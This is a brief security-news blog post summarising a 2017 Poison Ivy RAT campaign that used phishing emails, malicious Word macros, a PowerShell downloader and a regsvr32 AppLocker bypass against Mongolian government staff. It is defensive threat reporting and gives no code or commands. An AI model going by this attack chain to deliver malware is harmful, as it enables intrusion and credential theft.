Computer News & Safety tips  – Harry Waldron MVP Rotating Header Image

Malware – Poison Ivy RAT new delivery techniques DEC-2017

RAT = Remote Administration Toolkit attacks

Poison Ivy RAT has been revamped & it is using new evasion and distribution techniques. Tech Target security expert Nick Lewis explains the new attack methods that enterprises should look out for.

FireEye researchers found a Poison Ivy RAT campaign using new social engineering, evasion and distribution techniques to spread the malware, which is capable of key logging, password theft, and taking screen and video captures. What new attack and delivery methods should enterprises should be on the lookout for with this remote access Trojan?

FireEye researchers wrote about an attack using the Poison Ivy RAT, where a phishing email is used to get the victim to open a malicious Word document and execute a macro.  The emails were targeted at individuals working in the Mongolian government and claimed the documents contained webmail login instructions or information on a state law proposal.

The macro used a PowerShell script that downloads malware from the internet, along with decoy documents to divert the victim’s attention. The script writes its data to the registry, taking advantage of a vulnerability in AppLocker by using regsvr32.exe to install fileless malware on the endpoint.

Comments are closed.